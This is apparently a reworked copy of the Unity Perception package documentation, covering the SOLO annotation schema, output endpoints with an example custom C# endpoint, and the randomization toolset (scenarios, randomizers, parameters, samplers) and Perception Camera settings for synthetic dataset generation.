    "@type": "type.unity.com/unity.solo.SemanticSegmentationAnnotation",
    "id": "9ca0e2e4-5a0f-4ee3-8cae-b34565275059",
    "sensorId": "camera",
    "description": "Produces a semantic segmentation RGB mask",
    "imageFormat": "Png",
    "dimension": [
        1600.0,
        1200.0
    ],
    "filename": "step1.camera.9ca0e2e4-5a0f-4ee3-8cae-b34565275059.png",
    "instances": [
        {
            "labelName": "Baseboard-1",
            "pixelValue": [
                177,
                255,
                101,
                255
            ]
        }, ...
    ]
}

In an example semantic segmentation mask, items of the same class (e.g. dining chairs) all share the same color.

Note: unlabeled objects are rendered black in the segmentation mask.

Instance Segmentation

Similar to semantic segmentation, the instance segmentation annotation includes the filename of a color mask in PNG format. This time, each unique object has a unique color. The schema differs slightly from semantic segmentation, including an instanceId (the object ID, unique across the whole simulation) and a labelId (the numeric identifier of the object's class). For example:

"instances": [
    {
        "instanceId": 19,
        "labelId": 273,
        "labelName": "Wall",
        "color": [
            255,
            53,
            0,
            255
        ]
    }, ...
]

In an example instance segmentation mask, every object has its own unique color.
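Given the instances mapping, a mask can be decoded back into per-pixel instance IDs. A minimal Python sketch using Pillow and NumPy; the file name and instance list are placeholders that follow the schema above:

import numpy as np
from PIL import Image

# Placeholder: the "instances" array from the annotation JSON
instances = [
    {"instanceId": 19, "labelName": "Wall", "color": [255, 53, 0, 255]},
]

mask = np.array(Image.open('step.1.instance_segmentation.png').convert('RGBA'))

for inst in instances:
    # Pixels whose RGBA value matches this instance's unique color
    match = np.all(mask == np.array(inst['color'], dtype=mask.dtype), axis=-1)
    print(f"{inst['labelName']} (instance {inst['instanceId']}): {match.sum()} pixels")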

2D Bounding Box

Each bounding box record maps a tuple of (instance, label) to a set of 4 variables (x, y, width, height) that draws the bounding box.

3D Bounding Box

3D bounding box information. Unlike 2D bounding boxes, 3D bounding box coordinates are captured in the sensor coordinate system. Each bounding box record maps a tuple of (instance, label) to the translation, size, and rotation that draw the 3D bounding box, plus optionally the velocity and acceleration of the 3D bounding box.

Keypoints

Keypoint data, commonly used for human pose estimation.

Metrics

A metric stores extra metadata that can be used to describe a particular sequence, capture, or annotation. Metric records are stored as an arbitrary number (M) of key-value pairs. For a sequence metric, capture_id, annotation_id, and step should be null. For a capture metric, annotation_id can be null. For an annotation metric, all four of sequence_id, capture_id, annotation_id, and step are non-null. Metric files can be generated in parallel from different simulation instances.

Definitions

The sensor, annotation, and metric definition tables are static during the simulation. They typically come from the definition of the simulation and are generated during the simulation.

sensor_definitions.json

A JSON file containing the collection of all sensors present in the simulation. Each sensor is assigned a unique UUID. Each is associated with an ego and stores the ego's UUID as a foreign key.

Sensors extend this base sensor class and may include additional fields in their definitions.

annotation_definitions.json

A JSON file containing a collection of annotation specifications (annotation_definition). Each record describes a particular type of annotation.

metric_definitions.json

A JSON file storing a collection of metric specification records (metric_definition). Each specification record describes a particular metric stored in the metric values.

Schema Versioning

Versioning of the schema.

2. Perception Endpoint

Our legacy Perception output format, in which information is stored in captures and written at the end of the simulation (or in 150-frame chunks). Although this endpoint still supports all the new Labelers such as depth and occlusion, we strongly recommend trying the SOLO endpoint above for an easier post-processing and debugging experience.

3. No Output Endpoint

When selected, this endpoint writes no information to disk! This is useful to avoid generating extraneous datasets while debugging simulation logic in the editor or testing with the Perception Camera's real-time visualization tools.

How to Change the Active Endpoint

1. Project Settings → Perception
2. Click Change Endpoint Type
3. Select your preferred endpoint from the dropdown list.

Creating your Own Endpoint

With the Endpoint system, creating your own endpoint for your preferred output format is not only possible but quite accessible. We have put together a small example of a hypothetical custom endpoint to walk you through the basics of creating, iterating on, and using your own custom endpoint.

Perception packages after version 0.11.0-preview.1 support the concept of custom endpoints. Previously, all data generated by Perception was automatically written to disk using our proprietary output format. With a custom endpoint, however, you can use our intermediate representation to write all the data in an output format of your choice!

We demonstrate this with a hypothetical endpoint we call "FlatEndpoint", which writes all data into a unique folder per simulation run. To do this, we create a new class and implement IConsumerEndpoint. This allows our custom endpoint to be selected in the Perception Settings UI and used as the endpoint for the simulation. We further implement the IFileSystemEndpoint interface to hook into how Perception stores the location of the last created dataset and to make features like the "Show Latest Dataset" button work properly.

    using System;
    using System.Collections.Generic;
    using System.IO;
    using Newtonsoft.Json.Linq;
    using UnityEngine;
    using UnityEngine.Perception.GroundTruth;
    using UnityEngine.Perception.GroundTruth.Consumers;
    using UnityEngine.Perception.GroundTruth.DataModel;
    using UnityEngine.Perception.Settings;

    namespace MyCustomNamespace
    {
/// <summary>
/// Example endpoint which outputs all information in small files to one single directory.
/// We demonstrate two methods of serializing data: (1) Custom serialization; (2) IMessageProducers
/// </summary>
/// <remarks>For more complex examples, check out SoloEndpoint</remarks>
    [Serializable]
    public class FlatEndpoint : IConsumerEndpoint, IFileSystemEndpoint
    {
    public string prefix = "FLAT";

    DateTimeOffset m_SimulationStartTime;

/// Helper function to create a new JsonMessageBuilder
    JsonMessageBuilder GetNewJsonMessageBuilder() => new JsonMessageBuilder();

    #region IFileSystemEndpoint

    /// <summary>
    /// Allows the user to set the base path from the Perception Settings UI.
    /// </summary>
    public string basePath
    {
    get => PerceptionSettings.GetOutputBasePath();
    set => PerceptionSettings.SetOutputBasePath(value);
    }

    string m_CachedCurrentPath = string.Empty;
    /// <summary>
    /// The root directory to use for all files that we output.
    /// </summary>
    public string currentPath
    {
    get
    {
// Check if we already reserved the output path for this simulation run
    if (!string.IsNullOrWhiteSpace(m_CachedCurrentPath))
    return m_CachedCurrentPath;

// A small piece of logic to get the next available directory name
    // get: {basePath}/FLAT_0
    // if above already exists, then get: {basePath}/FLAT_1
    // ... and so on

    var availableSuffix = 0;
    m_CachedCurrentPath = string.Empty;
    do
    {
    m_CachedCurrentPath = Path.Combine(basePath, $"{prefix}_{availableSuffix}");
    availableSuffix++;
    }
    while (Directory.Exists(m_CachedCurrentPath));

// actually create the directory we decided upon above
    Directory.CreateDirectory(m_CachedCurrentPath);

    return m_CachedCurrentPath;
    }
    }

    /// <summary>
    /// The path used when "Reset to Default" is used in the Perception Settings UI.
    /// </summary>
    public string defaultPath => Path.Combine(Application.persistentDataPath);
    #endregion

    #region IConsumerEndpoint

    public string description => "Example endpoint that puts all the files in one single directory";

    /// <summary>
    /// Validate the configuration of your endpoint before the simulation runs.
    /// </summary>
    public bool IsValid(out string errorMessage)
    {
    // Check if the prefix supplied by the user is empty or whitespace
    if (string.IsNullOrWhiteSpace(prefix))
    {
    errorMessage = "Prefix must not be empty.";
    return false;
    }

    errorMessage = $"Directory {basePath} does not exist. Please create the directory.";
// To create {basePath}/FLAT_{xyz}, we need to ensure that the {basePath} directory exists.
// If it doesn't, the Perception Settings UI will show the above error message.
    return Directory.Exists(basePath);
    }

    public void SimulationStarted(SimulationMetadata metadata)
    {
// record when the simulation started so we can use this to calculate
// the duration of the simulation in the SimulationCompleted function
    m_SimulationStartTime = DateTimeOffset.Now;
    }

    public void SensorRegistered(SensorDefinition sensor)
    {
//// Using Method 1 (Custom Serialization)
// 1. Create a new JsonMessageBuilder class
    var builder = GetNewJsonMessageBuilder();

    // 2. Add all relevant fields to the builder as unique key-value pairs
    builder.AddString("model_type", sensor.modelType);
    builder.AddString("capture_mode", sensor.captureTriggerMode.ToString());
    builder.AddString("id", sensor.id);
    builder.AddInt("frames_between_captures", sensor.framesBetweenCaptures);
    builder.AddFloat("first_capture_frame", sensor.firstCaptureFrame);

// Invariant: The builder now contains a representation of the sensor class
// 3. We can use the ToJson function in the builder to write that representation to JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"sensor-{sensor.id}.json"),
    builder.ToJson()
    );
    }

    public void AnnotationRegistered(AnnotationDefinition annotationDefinition)
    {
//// Using Method 2 (IMessageProducer Serialization)

// 1. Create a new JsonMessageBuilder class
    var builder = GetNewJsonMessageBuilder();

    // 2. Allow the annotation definition to convert itself to a message and add it to our builder
    annotationDefinition.ToMessage(builder);

// Invariant: The builder now contains a representation of the annotation definition class
// 3. We can use the ToJson function in the builder to write that representation to JSON
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"annotation-definition-{annotationDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void MetricRegistered(MetricDefinition metricDefinition)
    {
// Using Method 2 (IMessageProducer Serialization)

// Similar to SensorDefinition, MetricDefinition also inherits from IMessageProducer so it can tell the builder how it should be serialized.
    var builder = GetNewJsonMessageBuilder();
    metricDefinition.ToMessage(builder);
    PathUtils.WriteAndReportJsonFile(
Path.Combine(currentPath, $"metric-definition-{metricDefinition.id}.json"),
    builder.ToJson()
    );
    }

    public void FrameGenerated(Frame frame)
    {
    // Using Method 2 (IMessageProducer Serialization)

// By default, the JsonMessageBuilder class does not know how to process image files referenced in the
// Frame class. So we need to make a new FlatFrameMessageBuilder that inherits from JsonMessageBuilder
// and specify how to handle image files. We can conveniently use the ToMessage function of the Frame
// class and pass in our new FlatFrameMessageBuilder class.
    var builder = new FlatFrameMessageBuilder(this, frame);
    frame.ToMessage(builder);

    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, $"frame-{frame.id}.json"),
    builder.ToJson()
    );
    }

    public void SimulationCompleted(SimulationMetadata metadata)
    {
    // Using Method 2 (IMessageProducer Serialization)

    // 1. Create a new JsonMessageBuilder class
    var metadataBuilder = GetNewJsonMessageBuilder();

    // 2. Add metadata as a message into the metadataBuilder
    metadata.ToMessage(metadataBuilder);

    // 3. Write the metadata parameter to {currentPath}/metadata.json
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "metadata.json"),
    metadataBuilder.ToJson()
    );

    //// Using Method 1 (Custom Serialization)

    // 1. Create a new JsonMessageBuilder class
    var completeBuilder = GetNewJsonMessageBuilder();
    var simulationEndTime = DateTimeOffset.Now;
    var simulationDuration = simulationEndTime - m_SimulationStartTime;

    // 2. Add all relevant key-value pairs
    completeBuilder.AddLong("start_timestamp", m_SimulationStartTime.ToUnixTimeMilliseconds());
completeBuilder.AddLong("end_timestamp", simulationEndTime.ToUnixTimeMilliseconds());
    completeBuilder.AddDouble("duration_seconds", simulationDuration.TotalSeconds);

    // 3. Convert data to json and write to file
    PathUtils.WriteAndReportJsonFile(
    Path.Combine(currentPath, "simulation-complete.json"),
    completeBuilder.ToJson()
    );
    }

/// <summary>
/// Placeholder for crash resumption logic.
/// </summary>
/// <remarks>Unsupported for FlatEndpoint</remarks>
    public (string, int) ResumeSimulationFromCrash(int maxFrameCount)
    {
    Debug.LogError("Crash resumption not supported for FlatEndpoint output.");
    return (string.Empty, 0);
    }

    public object Clone()
    {
    return new FlatEndpoint();
    }

    #endregion
    }

/// <summary>
/// A MessageBuilder that extends JsonMessageBuilder to add support for serializing images and tensors.
/// </summary>
    class FlatFrameMessageBuilder : JsonMessageBuilder
    {
    Frame m_Frame;
    FlatEndpoint m_Endpoint;

    public FlatFrameMessageBuilder(FlatEndpoint endpoint, Frame frame)
    {
    m_Endpoint = endpoint;
    m_Frame = frame;
    }

/// <summary>
/// Write out the byte array as an image, appending the sequence and step number to the key to construct the final file name.
/// </summary>
    public override void AddEncodedImage(string key, string extension, byte[] value)
    {
    if (value.Length > 0)
    {
    var filename = $"{key}_{m_Frame.sequence}-{m_Frame.step}.{extension.ToLower()}";
    // write out the file
    PathUtils.WriteAndReportImageFile(
    Path.Combine(m_Endpoint.currentPath, filename),
    value
    );
    }
    }

/// <summary>
/// A nested message adds the output of an IMessageBuilder to a specific key.
/// </summary>
    public override IMessageBuilder AddNestedMessage(string key)
    {
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    if (nestedValue.ContainsKey(key))
    {
    Debug.LogWarning($"Report data with key [{key}] will be overridden by new values");
    }

    nestedValue[key] = nested;
    return nested;
    }

    /// <summary>
/// Adds the output of an IMessageBuilder as an element of an array identified by the key <see cref="arraykey"/>.
    /// </summary>
    public override IMessageBuilder AddNestedMessageToVector(string arraykey)
    {
    if (!nestedArrays.TryGetValue(arraykey, out var nestedList))
    {
    nestedList = new List<JsonMessageBuilder>();
    nestedArrays[arraykey] = nestedList;
    }
    var nested = new FlatFrameMessageBuilder(m_Endpoint, m_Frame);
    nestedList.Add(nested);
    return nested;
    }

    // A tensor is a multi-dimensional array
    public override void AddTensor(string key, Tensor tensor)
    {
    // By default, write the tensor as a flattened array
    currentJToken[key] = new JArray(tensor.buffer);
    }
    }
    }

    Metadata Labeler

Outline

    Fundamentals

Feature | Description
Perception Camera | Captures RGB images and ground truth from a Camera
SOLO Schema | Schema for annotation, metric, and ground-truth data for the default SOLO endpoint
Labeling | A component that marks a GameObject and its descendants with a set of labels
Label Config | An asset that defines a taxonomy of labels for ground truth generation
Randomization | The Randomization tool set lets you integrate domain randomization principles into your simulation
FAQ | Frequently Asked Questions about common workflows and issues
Legacy Perception Schema | Schema for annotation, metric, and ground-truth data for the legacy Perception endpoint

    Labeling

Feature | Description
Labeling | A component that marks a GameObject and its descendants with a set of labels
Label Config | An asset that defines a taxonomy of labels for ground truth generation
Bounding Box 2D Labeler | Capture 2D bounding boxes for visible labeled objects
Hierarchical Bounding Boxes | How to combine bounding boxes of objects with parent-child hierarchical relationships during runtime
Bounding Box 3D Labeler | Capture 3D bounding boxes for visible labeled objects
Keypoint Labeler | Record the screen locations of specific points on labeled objects, such as keypoints on humans
Metadata Labeler | Reporting object-level or environment-level metadata information during runtime

    Randomization

Feature | Description
Randomization | The Randomization toolset lets you integrate domain randomization principles into your simulation
Scenarios | Scenarios control the execution flow of your simulation: how many iterations to run, which randomizers to use, etc.
Randomizers | Randomizers encapsulate specific randomization activities to perform during the lifecycle of a randomized simulation
Randomizer Tags | RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation
Parameters | Parameters are classes that utilize Samplers to deterministically generate random typed values
Samplers | Samplers generate bounded random float values by sampling from probability distributions

    Data Generation

Feature | Description
Perception Camera | Captures RGB images and ground truth from a Camera
Dataset Capture | Ensures sensors are triggered at proper rates and accepts data for the JSON dataset
Output Endpoint | Currently supported output endpoints are: No Output, Perception endpoint, and Solo endpoint
Metadata Labeler | Reporting object-level or environment-level metadata information during runtime

Resources

Original documentation: com.unity.perception/index.md at main · Unity-Technologies/com.unity.perception · GitHub

    API

    Labeling

    Label Config

    Bounding Box 2D Labeler

    Hierarchical Bounding Boxes

    Bounding Box 3D Labeler

    Keypoint Labeler

    Metadata Labeler

    Randomization

The Randomization toolset integrates randomization into synthetic dataset generation:

1. Parameters for randomization
2. Samplers that pick random values from the Parameters
3. Scenarios that coordinate the complete randomization process

The randomization workflow:

1. Create a Scenario
2. Define Randomizers and add them to the Scenario
3. Configure the Parameters and Samplers inside the Randomizers
4. Generate randomized training data for computer vision

    Scenarios

The predefined Fixed Length Scenario is loaded on an empty object in the scene:

(figure: Fixed Length Scenario component)

Scenarios have three roles:

1. Control the execution flow of the simulation
2. Organize the list of Randomizers
3. Define settings that can be configured from outside a built Unity player

By default, Perception includes one ready-made Scenario, the FixedLengthScenario class. This scenario runs each iteration for a fixed number of frames to create a dataset of a specified size.

    Scenario Lifecycle Hooks

Scenarios have a number of lifecycle hooks that are invoked during execution. Below is a diagram showing the sequence of operations of a typical scenario run:

(figure: scenario lifecycle diagram)

    JSON Configuration

Scenarios can be serialized to JSON, then modified and imported at runtime to configure simulation behavior, even after a Unity player has been built. By default, the following scenario settings can be serialized using the Generate JSON Config button in the scenario's inspector:

1. Scenario constants
2. String, numeric, and boolean fields on Randomizers and Parameters
3. The configurations of Constant, Uniform, and Normal samplers

Here is an example of loading a scenario JSON configuration into a Windows Unity player using --scenario-config-file: .\PerceptionTutorial.exe --scenario-config-file scenarioConfiguration.json
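
The exact file structure is easiest to obtain by pressing Generate JSON Config on your own scenario. As a purely hypothetical illustration of the kind of file produced (the top-level keys and field names may differ by package version), it could look like:

{
"constants": {
"totalIterations": 100,
"framesPerIteration": 1,
"randomSeed": 539662031
},
"randomizers": {
"RotationRandomizer": {
"rotation": { ... }
}
}
}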

    Implementing Custom Scenarios

For use cases where a scenario should run for an arbitrary number of frames, implementing a custom scenario may be necessary. Below are the scenario properties most commonly overridden to implement custom iteration conditions (a sketch of a custom scenario follows the Constants example below):

1. isScenarioReadyToStart - defines the conditions that determine when the scenario can begin iterating
2. isIterationComplete - defines the conditions that determine the end of a scenario iteration
3. isScenarioComplete - defines the conditions that determine when the scenario stops iterating

    Abstract Scenario Classes

When deriving a custom scenario, there are two abstract scenario classes to choose from, depending on your needs:

1. Scenario<T>: the most basic scenario class to derive from if you only need the basic scenario lifecycle coordination tools
2. PerceptionScenario<T>: the perception scenario abstract class introduces some useful functionality for scenarios that intend to generate datasets using the perception package's data capture tools.

    Scenario Constants

Constants include properties that configure the scenario's lifecycle settings, such as the starting iteration value or the total iteration count. By deriving your own constants class, you can add your own custom scenario settings to configure different scenario properties. Below is the Constants class used in the FixedLengthScenario class:

    [Serializable]
    public class Constants : ScenarioConstants
    {
    public int totalIterations = 100;
    public int framesPerIteration = 1;
    }
1. Make sure to include the [Serializable] attribute on the constants class. This ensures that the constants can be configured correctly from the Unity inspector.
2. The SerializeToJson() and DeserializeFromJson() methods of the Scenario class can be overridden to implement custom serialization strategies.
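
Putting the two previous sections together, here is a minimal sketch of a custom scenario with its own constants and a custom completion condition. It assumes, as in the FixedLengthScenario source, that the scenario base class exposes a constants field and a currentIteration counter; treat the member names as illustrative rather than authoritative, and note that PerceptionScenario<T> may require further overrides depending on the package version:

using System;
using UnityEngine.Perception.Randomization.Scenarios;

public class MyCustomScenario : PerceptionScenario<MyCustomScenario.Constants>
{
    [Serializable]
    public class Constants : ScenarioConstants
    {
        // Custom setting: how many iterations to run before stopping
        public int totalIterations = 100;
    }

    // Stop iterating once the configured iteration count is reached
    protected override bool isScenarioComplete => currentIteration >= constants.totalIterations;
}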

    Randomizers

Randomizers encapsulate specific randomization activities to perform during the execution of a randomized simulation. For example, there are Randomizers for spawning objects, repositioning lights, varying the color of objects, and so on. Randomizers expose random parameters in their inspector interface to further customize these variations. Users can add a set of Randomizers to a Scenario to define an ordered list of randomization activities to perform during the simulation lifecycle.

To define an entirely new Randomizer, derive the Randomizer class and implement one or more of the methods listed in the section below to randomize GameObjects while the simulation runs.

(figure: Randomizers added to a Scenario)

    Randomizer Hooks

1. OnCreate() - called when the Randomizer is added or loaded to a Scenario
2. OnIterationStart() - called at the start of a new Scenario Iteration
3. OnIterationEnd() - called after a Scenario Iteration has completed
4. OnScenarioComplete() - called after the entire Scenario has completed
5. OnStartRunning() - called on the first frame a Randomizer is enabled
6. OnStopRunning() - called on the first frame a disabled Randomizer is updated
7. OnUpdate() - executed every frame for enabled Randomizers

    Randomizer Coding Example

Below is the code for the rotation Randomizer example included in the Perception package:

    [Serializable]
    [AddRandomizerMenu("Perception/Rotation Randomizer")]
    public class RotationRandomizer : Randomizer
    {
    public Vector3Parameter rotation = new Vector3Parameter();

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<RotationRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    taggedObject.transform.rotation = Quaternion.Euler(rotation.Sample());
    }
    }
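
The tagManager.Query<RotationRandomizerTag>() call above relies on a matching tag component attached to the target objects. Such a tag can be as simple as an empty subclass; a minimal sketch (the version shipped with the package may carry additional attributes):

using UnityEngine.Perception.Randomization.Randomizers;

// Attach this component to every GameObject whose rotation should be randomized.
public class RotationRandomizerTag : RandomizerTag { }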

    Randomizer Library


Light Randomizer: targets all objects tagged with a Light Randomizer Tag.

Light Randomizer Tag: must be attached to a GameObject that has a Light component.

Parameters that can be randomized:

1. The probability of the light being switched on or off
2. Light intensity
3. Light temperature
4. Light color

Material Property Randomizer: targets all objects tagged with a Material Property Randomizer Tag.

Material Property Randomizer Tag: must be attached to a GameObject that has a Renderer component of some kind (MeshRenderer, BillboardRenderer, etc.).

For the shader of the selected material, specify which shader properties to modify and the ranges within which to modify them.


Material Swapper: targets all objects tagged with a Material Swapper Tag.

Material Swapper Tag: must be attached to a GameObject that has a material.

Given a list of materials, each iteration swaps the material of the tagged GameObject for one sampled from the list.


Scene Randomizer: given a list of scenes, loads a scene from the list every n iterations.

None of the scenes in the list should have a scenario component, since only one scenario component can be active at a time. The randomizers specified in the scenario of the starting scene persist and act on the objects in the newly loaded scene.


Sky Randomizer: targets all objects tagged with a Skybox Randomizer Tag.

Skybox Randomizer Tag: must be attached to a GameObject that has a Volume component (?).


Substance Randomizer: targets all objects tagged with a Substance Randomizer Tag.

Substance Randomizer Tag: must be attached to a GameObject that has a SubstanceGraph component.

(Author's note: this one seems advanced and not yet very stable, so use it sparingly; I have not worked with the SubstanceGraph component.)


Transform Randomizer: targets all objects tagged with a Transform Randomizer Tag.

Transform Randomizer Tag: can be attached to any GameObject.

1. Translation
  1. Whether it is enabled
  2. Translation range
  3. Whether the translation is relative or absolute (directly sets the coordinate values)
2. Rotation
  1. Whether it is enabled
  2. Rotation range
  3. Whether the rotation is relative or absolute (directly sets the rotation angles)
3. Scale
  1. Whether it is enabled
  2. Scale range
  3. Uniformly scaled? (whether all axes share the same randomized value)
  4. Whether the scaling is relative or absolute (directly sets the scale values)

Volume Randomizer: targets all objects tagged with a Volume Randomizer Tag.

Volume Randomizer Tag: must be attached to a GameObject that has a Volume component.

From the list of available post-processing effects, you can randomize which effects are applied and the specific parameters of each:

1. Bloom: threshold, intensity, scatter

2. Exposure: compensation

3. Depth of Field: near focus start and end, far focus start and end

4. Camera Type: a list of camera specifications (focal length, sensor size, lens shift, gate fit, etc.)

5. Motion Blur: intensity, minimum velocity, maximum velocity

6. Lens Distortion: intensity, X and Y multipliers, center, scale

    Randomizer Tags

RandomizerTags are the primary mechanism by which Randomizers query for a certain subset of GameObjects to randomize within a simulation. More specifically, RandomizerTags are components that can be added to GameObjects to register them with the active scenario's TagManager. This TagManager is aware of all tagged objects in the scene and can be queried to find all GameObjects carrying a particular tag. Below is a simple example: the ColorRandomizer queries, via the ColorRandomizerTag, for all GameObjects to which it will apply a random material base color:

    [Serializable]
    [AddRandomizerMenu("Perception/Color Randomizer")]
    public class ColorRandomizer : Randomizer
    {
    static readonly int k_BaseColor = Shader.PropertyToID("_BaseColor");

    public ColorHsvaParameter colorParameter;

    protected override void OnIterationStart()
    {
    var taggedObjects = tagManager.Query<ColorRandomizerTag>();
    foreach (var taggedObject in taggedObjects)
    {
    var renderer = taggedObject.GetComponent<MeshRenderer>();
    renderer.material.SetColor(k_BaseColor, colorParameter.Sample());
    }
    }
    }

RandomizerTags can also be used to customize how a Randomizer applies its randomizations to a particular GameObject.
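
For instance, a tag can carry per-object fields that the Randomizer reads back when applying its variation. A minimal sketch of that idea, with illustrative class and field names that are not part of the package:

using UnityEngine;
using UnityEngine.Perception.Randomization.Randomizers;

// Each tagged light carries its own intensity bounds.
[RequireComponent(typeof(Light))]
public class MyLightRandomizerTag : RandomizerTag
{
    public float minIntensity;
    public float maxIntensity;
}

A Randomizer querying tagManager.Query<MyLightRandomizerTag>() can then call GetComponent<MyLightRandomizerTag>() on each result and sample an intensity within that object's own [minIntensity, maxIntensity] range.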

    Parameters

Parameters are typically defined as fields of a Randomizer class, but they can also be instantiated like any other C# class:

// Create a color Parameter
    var colorParameter = new HsvaColorParameter();
    // Generate one color sample
    var color = colorParameter.Sample();

Note that Parameters, like Samplers, generate a new random value on each call to the Sample() method:

    var color1 = colorParameter.Sample();
    var color2 = colorParameter.Sample();
    Assert.AreNotEqual(color1, color2);

All parameters derive from the Parameter abstract class. Additionally, the parameters included in the Perception package derive from two specialized parameter base classes:

1. CategoricalParameter
2. NumericParameter

**Using Parameters outside of Randomizers (MonoBehaviours and ScriptableObjects):** after adding a public Parameter field to a MonoBehaviour or ScriptableObject, you may have noticed that the Parameter's UI looks different from when it is added to a Randomizer. This is because the Inspector UI for most Perception randomization components is written with Unity's relatively new UI Elements framework, whereas by default Unity uses the older IMGUI framework to render default inspector editors.

Say you have the following CustomMonoBehaviour with a public GameObjectParameter field:

    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;

    public class CustomMonoBehaviour : MonoBehaviour
    {
    public GameObjectParameter prefabs;
    }

**Categorical Parameters:** Categorical Parameters choose a value from a list of options that have no intrinsic ordering. For example, a material parameter randomly picks from a list of material options, but the list of material options itself can be rearranged into any particular order without affecting the distribution of the selected materials.

**Numeric Parameters:** Numeric Parameters use samplers to generate randomized structs. Check out the ColorHsvaParameter class included in the Perception package for an example of how to implement a Numeric Parameter.

    Samplers

Samplers in the Perception package are classes that deterministically generate random float values from bounded probability distributions. Although Samplers are often used with Parameters to generate arrays of typed random values, Samplers can be instantiated and used from any ordinary script. Several samplers are included in the Perception package.


**Constant Sampler:** generates a constant value when sampled:

    var sampler = new ConstantSampler();

    // set sampled value to be 25
    sampler.value = 25;

    // Generate a sample
    var sample = sampler.Sample(); // returns 25
    var sample2 = sampler.Sample(); // returns 25
    var sample3 = sampler.Sample(); // returns 25

**Uniform Sampler:** samples uniformly from a given range:

    var sampler = new UniformSampler();

    // generate values between the range 5 and 15
    sampler.range = new FloatRange(5, 15);

    // Generate a sample
    var sample = sampler.Sample(); // value between 5 and 15

(figure: uniform distribution)


**Normal Sampler:** samples from a normal distribution. Generates random samples from a truncated normal distribution bounded by the specified range:

    var sampler = new NormalSampler();

// the mean; in statistics, often denoted by µ
sampler.mean = 10;
// the standard deviation; in statistics, often denoted by σ
sampler.stdDev = 2;
// truncation: cut off values below -20 and above 20
    sampler.range = new FloatRange(-20, 20);

    // Generate a sample
    var sample = sampler.Sample();

(figure: truncated normal distribution)


**Animation Curve Sampler:**

Animation Curves are a built-in Unity feature, not something specific to Perception.

Samples values according to the range and probability distribution denoted by a user-provided AnimationCurve. The X axis of the curve corresponds to the values this sampler picks from, while the Y axis corresponds to the relative probability of those values. The relative probabilities (Y axis) do not need to max out at 1, as only the shape of the curve matters. The Y values cannot be negative, however.

    var sampler = new AnimationCurveSampler();

// create an animation curve programmatically
    sampler.distributionCurve = AnimationCurve.EaseInOut(0, 1, 1, 100);

    // Generate a sample
    var sample = sampler.Sample();

Animation curves are easier to create by exposing the sampler variable above in the Inspector and using Unity's UI to add and edit points on the curve.

    // Unity UI handles curve creation
    public AnimationCurve myDistributionCurve;

    ...

    void myFunction() {
    var sampler = new AnimationCurveSampler();

    // public variable containing the AnimationCurve
    sampler.distributionCurve = myDistributionCurve;

    // Generate a sample
    var sample = sampler.Sample();
    }

Samplers generate random values seeded by the active scenario's current random state. Changing the scenario's random seed will cause the Samplers to generate different values. Changing the order of Samplers, Parameters, or Randomizers will also lead to different values being sampled during a simulation. It is recommended that users do not generate random values with the UnityEngine.Random or System.Random classes in their simulations, since both can produce non-deterministic or improperly seeded random values. Using only Perception samplers to generate random values helps ensure that Perception simulations produce consistent results during local execution and on Unity Simulation in the cloud.

    Perception Camera

The Perception Camera component is attached to a Camera:

(figure: Perception Camera component inspector)

    Properties

Property | Function
Description | A description of the Camera to be registered in the JSON dataset.
Show Visualizations | Display realtime visualizations for labelers that are currently active on this camera.
Capture RGB Images | When you enable this property, Unity captures RGB images as PNG files in the dataset each frame.
Capture Trigger Mode | The method of triggering captures for this camera. In Scheduled mode, captures happen automatically based on a start frame and frame delta time. In Manual mode, captures should be triggered manually by calling the RequestCapture method of PerceptionCamera.
Override Layer Mask | When this property is enabled, labelers will use the layer mask on the Perception Camera instead of the culling mask on the camera when rendering objects during data capture. This override particularly affects object culling during segmentation image rendering.
Sensor Type | The camera sensor selected for producing pixel-based ground truth data.
Layer Mask | The layer mask used by labelers when the Override Layer Mask field is enabled.
Alpha Threshold | The minimum level of transparency required for a pixel to be rendered in segmentation images.
Camera Labelers | A list of labelers that generate data derived from this Camera.

    Properties for Scheduled Capture Mode

Property | Function
Simulation Delta Time | The simulation frame time in seconds for this camera. E.g. 0.0166 translates to 60 frames per second. This is used as Unity's Time.captureDeltaTime, causing a fixed number of frames to be generated for each second of elapsed simulation time, regardless of the capabilities of the underlying hardware. For more information on sensor scheduling, see DatasetCapture.
First Capture Frame | The frame number at which this camera starts capturing.
Frames Between Captures | The number of frames to simulate and render between the camera's scheduled captures. Setting this to 0 makes the camera capture every frame.

    Properties for Manual Capture Mode

Property | Function
Affect Simulation Timing | Have this camera affect simulation timings (similar to a scheduled camera) by requesting a specific frame delta time. Enabling this option lets you set the Simulation Delta Time property described above.
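
In Manual mode, captures are driven entirely from user code. A minimal sketch of triggering captures yourself via the RequestCapture method mentioned above (the key binding is only for illustration):

using UnityEngine;
using UnityEngine.Perception.GroundTruth;

public class CaptureOnKeyPress : MonoBehaviour
{
    PerceptionCamera m_PerceptionCamera;

    void Start()
    {
        // Assumes this script sits on the same GameObject as the Perception Camera
        m_PerceptionCamera = GetComponent<PerceptionCamera>();
    }

    void Update()
    {
        // Request a capture whenever the space key is pressed
        if (Input.GetKeyDown(KeyCode.Space))
            m_PerceptionCamera.RequestCapture();
    }
}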

    Output Resolution

When generating a dataset with the Unity Editor, the resolution of the images produced by the Perception Camera matches the resolution set for the Editor's Game view. However, images generated with built players (including local builds and Unity Simulation runs) use the resolution specified in the project settings. (This presumably refers to the compiled player.)

(figure: Game view resolution in the Unity Editor)

(figure: the Resolution and Presentation section of the project's Player settings)

    Accumulation

Accumulation allows you to use rendering techniques that require multiple frames to produce a final result, such as path tracing or accumulation motion blur.

    Camera Sensors

Custom camera sensors can be implemented for Perception Cameras to control how rendering is performed for all supported channel types (RGB, instance segmentation, normals, depth, etc.). The specific sensor selected for a Perception Camera can be configured with the Sensor Type field in the Perception Camera component inspector.

    Unity Camera Sensor

